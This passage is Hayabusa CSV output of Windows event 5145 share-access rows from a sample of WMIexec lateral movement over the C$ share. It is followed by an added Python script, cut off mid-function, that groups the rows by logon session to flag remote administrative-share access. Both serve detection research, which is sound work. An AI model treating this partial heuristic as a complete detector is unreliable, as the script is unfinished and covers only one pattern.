2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 
0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
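The 5145 rows above are Hayabusa's CSV rendering of a WMIexec-over-SMB sample: one account (admmig), one source address (10.23.23.9), the C$ administrative share, and two logon IDs (0x18acdd and 0x18b247), with dozens of objects touched in well under a second. The Python below is an added example for this page, not part of Hayabusa or of the EVTX-to-MITRE-Attack sample set. It parses this CSV layout, splits the pipe-delimited Details column, groups rows by (Computer, User, IP Addr, LID), and reports sessions that reached an administrative share from a non-local address. Its input embeds six Details strings copied from the rows above plus one constructed row (user jdoe, share \\*\Public, IP 10.23.23.50, all assumed) to show what is not flagged.

```python
"""Session-level triage of Hayabusa 5145 'Network Share File Access' rows.

Added example; not part of Hayabusa or of the sample EVTX set. It reads the
CSV layout Hayabusa wrote on this page, splits the 'Key: value | Key: value'
Details column, and groups rows by logon session so that remote access to an
administrative share stands out from ordinary file-server traffic.
"""
import csv
import io
from collections import defaultdict

# Header exactly as Hayabusa emitted it at the top of the CSV on this page.
HEADER = "Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath"
RULE = "rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml"
EVTX = ("../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/"
        "T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx")

# (Timestamp, Details) pairs: six copied from the page, the last one constructed
# (user jdoe on a non-administrative share) so the filter has something to reject.
SAMPLE_ROWS = [
    ("2021-04-22 20:32:31.937 +09:00", r"User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd"),
    ("2021-04-22 20:32:32.114 +09:00", r"User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd"),
    ("2021-04-22 20:32:32.130 +09:00", r"User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x18b247"),
    ("2021-04-22 20:32:32.130 +09:00", r"User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd"),
    ("2021-04-22 20:32:32.130 +09:00", r"User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247"),
    ("2021-04-22 20:32:32.130 +09:00", r"User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd"),
    ("2021-04-22 20:33:00.000 +09:00", r"User: jdoe | Share Name: \\*\Public | Share Path: \??\C:\Users\Public | Path: readme.txt | IP Addr: 10.23.23.50 | LID: 0x1a2b3c"),  # constructed
]


def build_csv(rows, computer="fs03vuln.offsec.lan"):
    """Assemble full Hayabusa-style CSV text from (Timestamp, Details) pairs."""
    buf = io.StringIO()
    w = csv.writer(buf, lineterminator="\n")
    w.writerow(HEADER.split(","))
    for ts, details in rows:
        w.writerow([ts, computer, "5145", "info", "Collect",
                    "Network Share File Access", details, RULE, EVTX])
    return buf.getvalue()


SAMPLE_CSV = build_csv(SAMPLE_ROWS)


def parse_details(details):
    """Split 'Key: value | Key: value' into a dict.

    Values can contain ': ' themselves (e.g. 'Share Path: \\??\\C:\\'), so only
    the first ': ' separates key from value; a key with no value maps to ''.
    """
    out = {}
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
        out[key.strip()] = value.strip() if sep else ""
    return out


def summarise_sessions(csv_text):
    """Group 5145 rows by (Computer, User, IP Addr, LID) and count what each touched.

    Paths are lower-cased because NTFS is case-insensitive and the page shows the
    same folder logged as both 'Users\\admmig' and 'USERS\\ADMMIG'.
    """
    sessions = defaultdict(lambda: {"count": 0, "shares": set(), "paths": set(),
                                    "first": None, "last": None})
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["EventID"] != "5145":
            continue
        d = parse_details(row["Details"])
        key = (row["Computer"], d.get("User", ""), d.get("IP Addr", ""), d.get("LID", ""))
        s = sessions[key]
        s["count"] += 1
        s["shares"].add(d.get("Share Name", ""))
        s["paths"].add(d.get("Path", "").lower())
        ts = row["Timestamp"]  # fixed-width, same offset: string order is time order
        s["first"] = ts if s["first"] is None else min(s["first"], ts)
        s["last"] = ts if s["last"] is None else max(s["last"], ts)
    return dict(sessions)


def is_admin_share(share_name):
    """True for administrative/special shares such as \\\\*\\C$ or \\\\*\\ADMIN$ (name ends in '$')."""
    return share_name.rsplit("\\", 1)[-1].endswith("$")


def flag_remote_admin_share_sessions(sessions, local_addrs=("127.0.0.1", "::1", "")):
    """Session keys that touched an administrative share from a non-local address."""
    return sorted(k for k, s in sessions.items()
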